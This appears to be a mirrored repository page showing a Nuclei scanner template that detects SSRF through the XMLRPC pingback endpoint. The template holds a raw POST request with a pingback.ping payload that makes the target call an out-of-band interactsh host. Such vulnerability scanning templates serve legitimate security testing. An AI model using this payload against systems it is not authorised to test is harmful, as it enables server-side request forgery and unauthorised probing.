mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-11 21:23:34 +08:00
* info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
33 lines
713 B
YAML
33 lines
713 B
YAML
id: xmlrpc-pingback-ssrf
|
|
|
|
info:
|
|
name: XMLRPC Pingback SSRF
|
|
author: geeknik
|
|
severity: high
|
|
reference:
|
|
- https://hackerone.com/reports/406387
|
|
tags: ssrf,generic,xmlrpc
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /xmlrpc/pingback HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<methodCall>
|
|
<methodName>pingback.ping</methodName>
|
|
<params>
|
|
<param>
|
|
<value>http://{{interactsh-url}}</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|